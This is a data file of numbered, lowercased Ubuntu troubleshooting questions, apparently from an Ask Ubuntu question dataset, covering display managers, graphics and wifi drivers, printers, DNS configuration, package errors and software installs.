339080	kde-full on ubuntu	since i am really willing to install krita on ubuntu , i installed kde-full to be able to do that . when i had to choose the default dm , i chose kdm . when i rebooted , ubuntu went to tty1 . the graphical login screen is gone and i can not get it back . i used dpkg-reconfigure lightdm kdm and chose lightdm as the default dm ; nothing happened . i am still stuck in tty1 . i even used the unity-greeter as the default dm , with no success also . i am really frustrated about this . i like ubuntu , but i am unable to use krita on it . the only way i am able to do that is by installing kde , which gets me into this trouble almost every time i install it . i did n't like kubuntu , and suffered from wifi issues with linux mint , so i am unable to use each of them , although they both make it possible for me to use krita . keep in mind that i am dual booting windows 7 with ubuntu 12.04 on a dell n5110 laptop which has two graphics cards , an intel hd one for regular graphics , and an nvidia for the high-end graphical applications .
339085	both displays crash if i change any display settings	i have a secondary display set up on my laptop which works fine with the default settings ( secondary display on the right of primary ) . however if i change any settings both screens go black . this includes changing the relative positions , using keyboard hotkeys to turn off the primary monitor , or just about anything else . my specs are the following : lenovo x1 carbon intel core i5 intel ivybridge mobile ubuntu 12.04 lts ( i must use this version for work ) display connected via mini-dp < -- > apple-branded vga converter < -- > monitor thanks
339087	is there such thing as a guest session on a system without a gui ?	i know that guest sessions can be disabled in ubuntu from lightdm.conf . is this something specific to systems with x installed or is it possible to have a guest session also on systems without a gui ( i.e . servers ) ?
339092	how to disable vim syntax color ?	i am working with an ubuntu 10.04 vm . by default , vim shows syntax color and i do n't want it . i do not have a .vimrc file in my home directory ( or anywhere in the system for that matter ) . i do have a file called .viminfo in my home directory but that does n't seem to be where the setting is because when i rename it , the syntax color is still on . i also like to have line numbers and for that i created a .exrc file in my home .
339093	how do i install brother ql-700 label printer drivers in ubuntu 12.04 ?	i recently purchased a brother ql-700 label printer for printing address labels in ubuntu 12.04 . the brother website lists linux drivers , specifically for ubuntu 8.04+ . i have installed the driver and the printer shows up in system settings → printers , but the status there is stuck at `` processing - waiting for printer to become available '' and i 'm unable to use the printer . in case anyone 's wondering , i have indeed : powered it on , connected it via usb , installed both the lpr and cupswrapper drivers listed , and followed the directions on brother 's site . i 'm kind of at a loss . any help would be appreciated .
339095	not able to install from usb on a mac	i did everything correctly . i ran the iso ( rebooting the mac , then booting from usb ) , and then chose the option to install ubuntu . i then got a black screen for about 10 seconds , and then received the following message : ata_id [ 350 ] : hdio_get_identity failed for '/dev/sdc ' : invalid argument what is going on here ? i really need some serious help . what should i do ? i 've already partitioned my disk into linux and linux swap , both with the correct format ( ms-dos `` fat '' ) . thanks to anyone who helps .
339096	openvpn and iptv	my home computer ( ubuntu 12.04 ) is behind router and has all tcp ports and some main udp ports forwarded to it . i 'm also able to watch iptv from it via vlc . channels in vlc playlist got addresses udp : // @ 239.2.3.xxx:1234 . recently i had to set up openvpn server on that computer and frequently using it . i 've set up vpn server from this guide . i 'm not very familiar with configuring routers so i wonder if it is possible to view that iptv while connected to vpn server ( maybe there 's a software solution ) ? right now if i execute the same playlist on remote computer it 's not working . thanks in advance .
339097	broadcom wifi bcm4318 [ airforce one54g ] does not connect	i am hoping someone in here can help me . i am new to linux and ubuntu . but i have to say i really love using the os . i am running ubuntu 12.04 along side windowns 7 . both os are running perfect bar the wireless on ubuntu , just not working . network cable is fine . my system details are acer aspire 5103 wlmi , amd turion 64x2 , 120g hd , upgraded to 4g ram with ubuntu running along side windows 7 . network controller is working fine , with perfect wifi on the windows 7 partition . but i have tried everything to get the wifi to work on ubuntu with no luck so far . below is the network controller details . network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) . i have tried everything on the how to install broadcom wireless drivers reless-drivers page . with no joy . i have been at this three days now . all help and advice welcome ! even if it doesnt work . trial and error can be a great way to learn . regards sean
339102	equalizer presets for audacious 3.3.4	can equalizer presets be installed for audacious 3.3.4 on the gtk interface running on ubuntu 13.04 ?
339104	mute key mutes master and headphone/speaker ( alsa channels ) , but unmutes only master	i 'm using ubuntu studio 13.04 on a thinkpad t420s . i have n't customised the mute/volume scripts etc . the mute key mutes my audio but does n't unmute it . when i run alsamixer i see the effect of the mute key on alsa : it mutes both the `` master '' and the `` headphone '' / '' speaker '' channels , but then on un-mute it only un-mutes the `` master '' channel . i can manually un-mute the component channels in alsamixer , and my sound comes back . but of course i should n't have to . how do i fix it so that mute-unmute works via the key ? ( my problem seems similar to question 118675 but not the same , and the accepted answer there does n't affect my situation . ) ( i was using older ubuntu studio 11.10 until recent upgrade , and the mute key was configured fine . )
339107	why does n't my trackpoint configure save , despite udev rule ?	i have followed the instructions from here exactly . i was able to increase the speed and sensitivity of my trackpoint . however , those settings would revert itself to the default upon restart . in other words , the settings do n't save . what am i doing wrong ? i 'm using ubuntu 12.04 on a lenovo thinkpad x120e that has an amd 64-bit processor . please someone help me with this , as i can not use the touchpad , and i will have to dump linux and go back to windows if i do n't have proper trackpoint support .
339108	installing ruby	i found a tutorial in this site showing how to install ruby . the problem is i found the terminal is asking to install packages that are already installed reading package lists ... installing required packages : gawk , g++ , libreadline6-dev , zlib1g-dev , libssl-dev , libyaml-dev , libsqlite3-dev , sqlite3 , autoconf , libgdbm-dev , libncurses5-dev , automake , libtool , bison , libffi-dev
339110	how do you delete the altternate version of notes in everpad ?	everpad keeps accumulating alternate version , while the desktop version and the web version of evernote do not . how does one get rid of the alternate version links ? they are taking up a lot of real estate .
339115	format usb drive using mformat ?	i have tried many different things to try to format my usb drive , but none of them work ... how might i do this using the mformat commands ? thanks !
339116	brightness is too much and i ca n't control it	i have installed brightness indicator , but there is no benefit as there is an error popping out : no backlights were found on your system . i am using a desktop . and the brightness and lock setting is also not showing any brightness bar . please help me . it 's straining my eyes .
339124	pulse audio driver malfunctioning ?	so i use ubuntu 12.04 lts 32 bit on a eee asus netbook , and occasionally when i use vlc media player this message displays freezing up the video along with : potential pulseaudio version problem : pulseaudio is streaming with an excessive latency . sound may be lost or quality degraded . to address that issue , upgrade the pulseaudio daemon to version 3.0 , or disable the alternate sampling rate in its configuration . what should i do ? if i upgraded the driver , how do i upgrade it correctly ?
339125	is there a linux file manager with a proper drop-down tree view ? ( like finder in os x )	as a happy linux user for almost a year now , this is the bane of my existence . does the linux community hate tree views for some obscure reason ? i do n't mean a tree view in the side panel . that 's useless . i mean a proper tree view , such that , when i click the triangle , all files and subdirectories contained within the directory show beneath , and i can drag and drop files , open and close trees . it is extremely frustrating to navigate and move files around deeply nested directories without this feature . i 've tried : nautilus , pcmanfm , emelfm , krusader . i find it hard to believe that even crazilly-full-featured file managers like krusader would be missing this most obvious of features ... and yet , here i am . for all the effort put into those file managers , is this so far fetched to ask for ? : i just need a simple , single-pane file manager with a tree view option . help !
339148	e : sub-process /usr/bin/dpkg returned an error code ( 2 ) -- whats the problem with this ?	error when installing any packages.. pls help.. thanks in advance.. been trying to solve this for days now.. still ca n't solve it.. already tried $ sudo apt-get update $ sudo apt-get upgrade $ sudo apt-get autoremove $ sudo apt-get clean etc.. preconfiguring packages ... selecting previously unselected package libglade2-0 : amd64 . dpkg : unrecoverable fatal error , aborting : reading files list for package 'linux-headers-3.8.0-19 ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 )
339161	i can ping ip address but can not ping hostname	my address : user @ pc1 : ~ $ ifconfig eth0 |grep `` inet `` inet addr:192.168.2.10 bcast:192.168.2.255 mask:255.255.255.0 i can ping this address user @ pc1 : ~ $ ping -c 1 192.168.2.11 ping 192.168.2.11 ( 192.168.2.11 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.2.11 : icmp_req=1 ttl=64 time=0.686 ms -- - 192.168.2.11 ping statistics -- - 1 packets transmitted , 1 received , 0 % packet loss , time 0ms rtt min/avg/max/mdev = 0.686/0.686/0.686/0.000 ms but pinging its hostname seems to resolve the ip address , but it doesnât return pings . user @ pc1 : ~ $ ping -c 1 pc2.dtvg.nix ping pc2.dtvg.nix ( 192.128.2.11 ) 56 ( 84 ) bytes of data . -- - pc2.dtvg.nix ping statistics -- - 1 packets transmitted , 0 received , 100 % packet loss , time 0ms while pinging another hostname on the same network works fine . user @ pc1 ~ $ ping -c1 gw.dtvg.nix ping gw.dtvg.nix ( 192.168.2.1 ) 56 ( 84 ) bytes of data . 64 bytes from gw.dtvg.nix ( 192.168.2.1 ) : icmp_req=1 ttl=64 time=0.220 ms -- - gw.dtvg.nix ping statistics -- - 1 packets transmitted , 1 received , 0 % packet loss , time 0ms rtt min/avg/max/mdev = 0.220/0.220/0.220/0.000 ms my /etc/resolve.conf user @ pc1 : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search dtvg.nix named.conf on my nameserver ( gw ) root @ gw : /var/cache/bind # cat /etc/bind/named.conf.local zone `` dtvg.nix '' { type master ; file `` /var/cache/bind/db.dtvg.nix '' ; allow-update { key dhcpupdate ; } ; } ; zone `` 2.168.192.in-addr.arpa '' { type master ; notify no ; file `` /var/cache/bind/db.2.168.192.in-addr.arpa '' ; allow-update { key dhcpupdate ; } ; } ; reverse lookup on my nameserver , gw , with unnecessary hosts removed root @ gw : /var/cache/bind # cat db.2.168.192.in-addr.arpa $ origin . $ ttl 604800 ; 1 week 2.168.192.in-addr.arpa in soa dtvg.nix . root.dtvg.nix . ( 140 ; serial 604800 ; refresh ( 1 week ) 86400 ; retry ( 1 day ) 2419200 ; expire ( 4 weeks ) 604800 ; minimum ( 1 week ) ) ns gw.dtvg.nix . $ origin 2.168.192.in-addr.arpa . 1 ptr gw.dtvg.nix . $ ttl 604800 ; 1 week 10 ptr pc1 11 ptr pc2 forward lookup zone file on my nameserver , gw , with unnecessary hosts removed root @ phoenix : /var/cache/bind # cat db.dtvg.nix $ origin . $ ttl 604800 ; 1 week dtvg.nix in soa dtvg.nix . root.dtvg.nix . ( 140 ; serial 604800 ; refresh ( 1 week ) 86400 ; retry ( 1 day ) 2419200 ; expire ( 4 weeks ) 604801 ; minimum ( 1 week 1 second ) ) ns gw.dtvg.nix $ origin dtvg.nix . $ ttl 604800 ; 1 week gw a 192.168.2.1 pc1 a 192.128.2.10 pc2 a 192.128.2.11
339163	cinnamon crashing on logon 12.04	i installed cinnamon by downloading the deb files and running them in the ubuntu software center when the ppa method failed . i tried both the stable and nightly builds , but i got a `` can not access error . '' other ppa 's work and the stable ppa works when i try it on my vm . when i log on cinnamon just crashes and i get the gnome fallback . updates have done no good towards this ( i have had a few after trying to get cinnamon to work ) . i found this log : activating service name='org.a11y.atspi.registry' [ +0.00s ] debug : unity-greeter.vala:895 : starting unity-greeter 0.2.9 uid=104 lang=en_us.utf-8 [ +0.00s ] debug : unity-greeter.vala:898 : setting cursor [ +0.00s ] debug : unity-greeter.vala:902 : creating background surface [ +0.00s ] debug : unity-greeter.vala:905 : loading command line options [ +0.00s ] debug : unity-greeter.vala:933 : setting gtk+ settings successfully activated service 'org.a11y.atspi.registry' ** ( at-spi2-registryd:8123 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( at-spi2-registryd:8123 ) : warning ** : unable to register client with session manager [ +0.03s ] debug : unity-greeter.vala:956 : creating unity greeter [ +0.03s ] debug : connecting to display manager ... [ +0.03s ] debug : wrote 17 bytes to daemon [ +0.03s ] debug : read 8 bytes from daemon [ +0.03s ] debug : read 120 bytes from daemon [ +0.03s ] debug : connected version=1.2.3 default-session=ubuntu show-manual- login=false hide-users=false has-guest-account=true [ +0.08s ] debug : menubar.vala:359 : lang=en_us.utf-8 language= ( null ) [ +0.09s ] critical : g_error_free : assertion `error ! = null ' failed [ +0.09s ] debug : get entries [ +0.09s ] debug : menubar.vala:541 : adding indicator object 0x1892078 at position 0 [ +0.09s ] debug : evaluating bitmask for ' % l : % m % p' [ +0.09s ] debug : checking against 2 possible times [ +0.09s ] debug : guessing max time width : 62 [ +0.09s ] debug : get entries [ +0.09s ] debug : menubar.vala:541 : adding indicator object 0x19091b8 at position 1 [ +0.09s ] warning : indicatorobject class does not have an accessible description . [ +0.10s ] warning : indicatorobject class does not have an accessible description . [ +0.10s ] debug : get entries [ +0.10s ] debug : get entries [ +0.10s ] debug : menubar.vala:541 : adding indicator object 0x19830a8 at position 2 [ +0.10s ] debug : menubar.vala:365 : lang=en_us.utf-8 language= ( null ) [ +0.10s ] debug : loaded session /usr/share/xsessions/cinnamon.desktop ( cinnamon , this session logs you into cinnamon ) [ +0.10s ] debug : loaded session /usr/share/xsessions/mate.desktop ( mate , this session logs you into mate ) [ +0.10s ] debug : loaded session /usr/share/xsessions/gnome-classic.desktop ( gnome classic , this session logs you into gnome with the traditional panel ) [ +0.10s ] debug : ignoring session /usr/share/xsessions/gnome-shell.desktop [ +0.10s ] debug : loaded session /usr/share/xsessions/ssh.desktop ( secure remote connection , this session logs you into a remote host using ssh ) [ +0.10s ] debug : loaded session /usr/share/xsessions/cinnamon2d.desktop ( cinnamon ( software rendering ) , this session logs you into cinnamon ( using software rendering ) ) [ +0.10s ] debug : loaded session /usr/share/xsessions/ubuntu-2d.desktop ( ubuntu 2d , this session logs you into ubuntu 2d mode ) [ +0.10s ] debug : loaded session /usr/share/xsessions/ubuntu.desktop ( ubuntu , this session logs you into ubuntu ) [ +0.10s ] debug : ignoring session /usr/share/xsessions/gnome.desktop [ +0.10s ] debug : loaded session /usr/share/xsessions/gnome-fallback.desktop ( gnome classic ( no effects ) , this session logs you into gnome with the traditional panel without any graphical effect . ) [ +0.10s ] debug : session-chooser.vala:42 : adding session cinnamon ( cinnamon ) [ +0.10s ] debug : session-chooser.vala:42 : adding session cinnamon2d ( cinnamon ( software rendering ) ) [ +0.10s ] debug : session-chooser.vala:42 : adding session gnome-classic ( gnome classic ) [ +0.10s ] debug : session-chooser.vala:42 : adding session gnome-fallback ( gnome classic ( no effects ) ) [ +0.10s ] debug : session-chooser.vala:42 : adding session mate ( mate ) [ +0.10s ] debug : session-chooser.vala:42 : adding session ssh ( secure remote connection ) [ +0.10s ] debug : session-chooser.vala:42 : adding session ubuntu ( ubuntu ) [ +0.10s ] debug : session-chooser.vala:42 : adding session ubuntu-2d ( ubuntu 2d ) [ +0.16s ] debug : setting keyboard layout to 'us' [ +0.19s ] debug : main-window.vala:98 : screen is 1920x1080 pixels [ +0.19s ] debug : main-window.vala:104 : monitor 0 is 1920x1080 pixels at 0,0 [ +0.20s ] debug : loading users from org.freedesktop.accounts [ +0.20s ] debug : loading user /org/freedesktop/accounts/user1000 [ +0.23s ] debug : loading sessions from org.freedesktop.displaymanager [ +0.23s ] debug : unity-greeter.vala:332 : adding/updating user raiderzulu ( raiderzulu ) [ +0.23s ] debug : unity-greeter.vala:189 : adding guest account entry [ +0.28s ] debug : starting authentication for user raiderzulu ... [ +0.28s ] debug : wrote 26 bytes to daemon [ +0.28s ] debug : unity-greeter.vala:959 : showing greeter [ +0.28s ] debug : unity-greeter.vala:357 : showing main window [ +0.28s ] debug : new style for time label [ +0.28s ] debug : evaluating bitmask for ' % l : % m % p' [ +0.28s ] debug : checking against 2 possible times [ +0.28s ] debug : guessing max time width : 62 [ +0.30s ] debug : background.vala:315 : regenerating backgrounds [ +0.30s ] debug : background.vala:67 : making background /media/drafthorse/windows/web/wallpaper/alienware/chrome-red.jpg at 1920x1080 [ +0.30s ] debug : new style for time label [ +0.30s ] debug : evaluating bitmask for ' % l : % m % p' [ +0.30s ] debug : checking against 2 possible times [ +0.30s ] debug : guessing max time width : 62 [ +0.30s ] debug : unity-greeter.vala:972 : starting main loop [ +0.30s ] debug : read 8 bytes from daemon [ +0.30s ] debug : read 40 bytes from daemon [ +0.30s ] debug : prompt user with 1 message ( s ) [ +0.32s ] warning : getting layout failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.dbusmenu ' on object at path /com/canonical/indicator/users/menu [ +0.32s ] debug : unity-greeter.vala:315 : starting system-ready sound [ +0.79s ] debug : setting keyboard layout to 'us' [ +0.82s ] debug : num devices : '2' [ +0.82s ] debug : get_primary_device : got data from object /org/freedesktop/upower/devices/line_power_acad [ +0.82s ] debug : get_primary_device : got data from object /org/freedesktop/upower/devices/battery_bat1 [ +0.82s ] debug : put_primary_device : got data from object /org/freedesktop/upower/devices/battery_bat1 [ +0.82s ] debug : set_accessible_desc : setting accessible description to 'battery ( 2 minutes to charge ( 79 % ) ) ' [ +0.82s ] debug : num devices : '2' [ +0.82s ] debug : menu_add_device : got data from object /org/freedesktop/upower/devices/line_power_acad [ +0.82s ] debug : menu_add_device : got data from object /org/freedesktop/upower/devices/battery_bat1 [ +0.82s ] debug : icon_policy is : 0 ( present==0 , charge==1 , never==2 ) [ +0.82s ] debug : count_batteries found 1 batteries ( 1 are charging/discharging ) [ +0.82s ] debug : should_be_visible : yes [ +0.82s ] debug : refresh_entry_accessible_desc : setting entry 0x17f25f8 accessible description to 'battery ( 2 minutes to charge ( 79 % ) ) ' [ +0.82s ] debug : get entries [ +0.82s ] debug : get entries [ +0.82s ] debug : get entries [ +0.82s ] debug : menubar.vala:541 : adding indicator object 0x17f25f8 at position 2 [ +0.82s ] debug : notify visible signal received [ +0.82s ] critical : ido_calendar_menu_item_set_date : assertion `ido_is_calendar_menu_item ( menuitem ) ' failed [ +0.82s ] debug : connected to application indicator service . [ +0.82s ] debug : new calendar item [ +0.83s ] debug : background.vala:116 : render of background /media/drafthorse/windows/web/wallpaper/alienware/chrome-red.jpg complete [ +0.84s ] debug : indicator-sound : new_volume_slider_widget [ +0.84s ] debug : indicator-sound : new_voip_slider_widget [ +0.84s ] debug : request current apps [ +3.06s ] debug : providing response to display manager [ +3.06s ] debug : wrote 22 bytes to daemon [ +3.12s ] debug : read 8 bytes from daemon [ +3.12s ] debug : read 22 bytes from daemon [ +3.12s ] debug : authentication complete for user raiderzulu with return code 0 [ +3.12s ] debug : starting session cinnamon [ +3.12s ] debug : wrote 20 bytes to daemon [ +3.12s ] debug : read 8 bytes from daemon [ +3.12s ] debug : read 4 bytes from daemon whether it is the right one or not i do not know , but it does seem to have something from the crash . i am running ubuntu along side win7 ultimate on an alienware m18x r2 with three drives installed . drive 0 is the drive with all of the bootable partitions and the other two are set up as semi-permanent storage drives ( formatted in ntfs ) that are meant to be replaced when they get full . other than that it is a fairly stock machine . the processor is a ( taken straight from the system spec reader ) intel® core™ i7-3840qm cpu @ 2.80ghz with a pair of geforce gtx 680m 's running together ( i am actually not sure if sli is active or not ) and 32 gib of ram installed . i have gotten mate to work , but i need cinnamon to really function properly .
339167	radeon hd 7870 works well in ubuntu 13.04 ?	i 'm planning to buy an radeon hd 7870 card and i would like to know if it works well with ubuntu 13.04 . i play games on steam , and i will use the proprietary drivers from the amd website . is the performance good ? does it have any known problems ?
339169	how to install tomcat 7.0.42 on ubuntu 12.04.3 lts ?	the sysadmin gave me a virtual machine which i access through terminal . i have root access and it got ubuntu 12.04.3 lts . the command apt-cache policy tomcat7 informs : tomcat7 : installed : ( none ) candidate : 7.0.26-1ubuntu1.2 version table : 7.0.26-1ubuntu1.2 0 500 http : //br.archive.ubuntu.com/ubuntu/ precise-updates/universe amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages 7.0.26-1ubuntu1 0 500 http : //br.archive.ubuntu.com/ubuntu/ precise/universe amd64 packages root @ mymachine : ~ # however , i 'd like to install the latest tomcat 7 ( 7.0.42 ) on it . is it doable ? if yes , how ?
339175	i want to install ubuntu in a specific partition	i have two partitions : i want to install ubuntu in my first partition without losing any data on the other . i need to use them after the installation . my other question is if my nvidia geforce 8400gs works well in ubuntu . thanks for the answers !
339184	libreoffice base in ubuntu 12.04 lts : screenshot showing too small database number field	if i ask libreoffice base to show me the result of a query , the resulting screen will show the total number of datasets and the number of the currently selected dataset on the bottom left . however , the field to show the currently selected dataset is way too small ( i attached a screenshot ) . i have a standard ubuntu 12.04 installation with its standard theme and its standard libreoffice base running . one work-around is to change the theme to `` ambience '' . i however would like to stay with the standard theme . i posted this question in the libreoffice forum . they told me to better ask here . this is how it looks :
339185	how to install oracle 11g on linux ( non-vm )	i 'm totally new to linux so please excuse my ignorance . i 've got ubuntu server installed on an hp proliant dl server ; no gui available . i 'm trying to install oracle 11g on this server and i 'm running into a lot of xterm , xhost issues etc . i 've tried all the googled solutions to no avail . can anyone provide or link me to a step-by-step guide on how to install oracle on linux in a non-vm environment ?
339191	ubuntu 12.04.3 takes too long to mount usb 3.0 ntfs hard drive	i just upgraded my ubuntu from 12.04.2 kernel 3.5.0-39 to 12.04.3 kernel 3.8.0-29 ( raring kernel ) . here is the problem : when i connect the usb 3.0 ntfs hard drive to my system , it takes about 5-7 min to mount the hard drive successfully ! the usb 3.0 ntfs hard drive works well with ubuntu 12.04.2 kernel 3.5.0-39 and windows 8 ( dual boot ) . lsusb output : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 004 device 002 : id 125f : a21a a-data technology co. , ltd . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 006 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 004 : id 058f : a014 alcor micro corp . bus 001 device 005 : id 0bda:0139 realtek semiconductor corp . bus 002 device 003 : id 046d : c058 logitech , inc. m115 mouse dmesg | tail -n 50 : [ 2110.871454 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2110.890464 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2110.891863 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2110.891874 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2142.823966 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2142.842895 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2142.844277 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2142.844288 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2174.776259 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2174.795360 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2174.796794 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2174.796805 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2175.677168 ] sd 7:0:0:0 : [ sdc ] no caching mode page present [ 2175.677180 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 2206.728759 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2206.747804 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2206.749238 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2206.749250 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2238.681134 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2238.700144 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2238.701552 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2238.701563 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2270.633590 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2270.652574 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2270.653947 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2270.653958 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2302.586048 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2302.605016 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2302.606406 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2302.606417 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2303.853319 ] sdc : sdc1 [ 2303.856211 ] sd 7:0:0:0 : [ sdc ] no caching mode page present [ 2303.856214 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 2334.538275 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2334.553109 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2334.554479 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2334.554481 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2366.490863 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2366.509769 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2366.511152 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2366.511183 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2398.443073 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2398.457795 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2398.459303 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2398.459309 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2430.395719 ] usb 4-1 : reset superspeed usb device number 2 using xhci_hcd [ 2430.414627 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . [ 2430.415988 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad8780 [ 2430.415997 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880147ad87c0 [ 2431.294666 ] sd 7:0:0:0 : [ sdc ] attached scsi disk how could i fix this issue ?
339199	how to modify and give acces to user in sudo file	when i am trying to install vim using sudo apt-get install vim , its showing sudoers file error . please help me out .
339202	how do i log visited sites ( for all users in a system ) ?	i want to log all sites users in my system visit . is there any software for ubuntu like network magic for windows ?
339204	lenovo e531 - fn keys do n't work properly	although fn + f1 , f2 or f3 work well ( they stand for audio volume ) , fn + f5 or f6 do n't . they should make the brightness of a display more and less , but instead they just make the brightness 0 and 10 of 100 and nothing else . has anybody faced with the same problem ? have you solved it ? by the way , they work properly in window , at least at windows 8 .
339207	how to install recordmydesktop in ubuntu	i am new to ubuntu and linux . i have installed ubuntu on windows using vm player . while learning ubuntu , i want to record the actions i perform on the system . when i searched using chrome browser on ubuntu , i found the application recordmydesktop on apps.ubuntu.com when i try to download the file , i am shown a pop-up asking to choose an application to launch the application . i am not sure on how to proceed from now on . i do not see any applications listed in the dialog box . hence a bit confused . can you please help me out in resolving the issue at the earliest ? thanks
339210	install nvidia geforce 740m driver in ubuntu 12.04	i have a laptop with vga onboard intel hd integrated graphics and an nvidia geforce 740m graphics processor . how i can install the nvidia geforce 740m driver in ubuntu 12.04 ? because , yesterday i ca n't install it . after restarting my laptop 's resolution was 600x480 . do i have to install that with terminal ppa or by downloading the file from the nvidia official website ? please give me solutions . thanks .
339212	'zeitgeist-fts ' always using a lot of memory !	what is zeitgeist-fts ? ! it 's always in the 3 top positions of memory usage ( competing with firefox and compiz ! ! ) ... after a fresh boot it uses about 30 mb , but after some hours or a day , it goes above 300 mb and stays their ! the file of this process is located at /usr/lib/zeitgeist/zeitgeist-fts . i do n't know what this thing does , but if it does n't break any functionality , i would be really happy to remove it , because memory capacity is very precious to me ... edit : i 'm using unity desktop on ubuntu-12.04.2 lts .
339217	unable to locate package libopencv-dev	i 'm running 12.04 desktop on a persistence usb pendrive . i googled around , but answers say something like : ubuntu 12.04 provides a package of opencv 2.3.1 that you can easily install by typing : sudo apt-get install libopencv-dev but it does not work for me . $ sudo apt-get install libopencv-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libopencv-dev the following commands each returned successful results : sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install build-essential cmake
339221	having problem with squidguard . need help	when i write down this command on my terminal for configuring squidguard squidguard -d this error shows up squidguard : error while loading shared libraries : libdb-4.6.so : can not open shared object file : no such file or directory
339228	set up a server	we want to set up a server in our office and we face some problems . we have a network with 9 computers all in windows . we would like to change our server from windows server to ubuntu desktop ( or server if this is more suitable ) . is that possible ( only server with ubuntu and the rest with windows ) ? could we get some support from you ( some person to talk to and possible to visit us in our office ) on this issue ? thank you for your actions . sincerely .
339229	safe to install this xerox printer driver on ubuntu 13.04 ?	as the title says , is it safe for me to install this driver for a xerox workcentre 7835 printer on my ubuntu 13.04 installation ? because when i try to install them it says something about a bad package quality . i really do n't want to break my ubuntu setup . here is the driver here is the log
339230	how do i trigger rsync on file modification ?	i can sync folders with rsync -avz /directory /target , now i wish to do it if i changed a file in /directory so rsync should be called automatically . i am using virtual box and the shared folder of virtual box is really slow , especially if you have a webpage which is using the shared folder as document root . with rsync i would be able to work with my local files on shared folder and sync it automatically with document root . i hope someone has an idea how to do so , crontab would be not good , because it is executed each x minutes , so if i do n't do anything , it will still call rsync but not if i modified my file . best regards
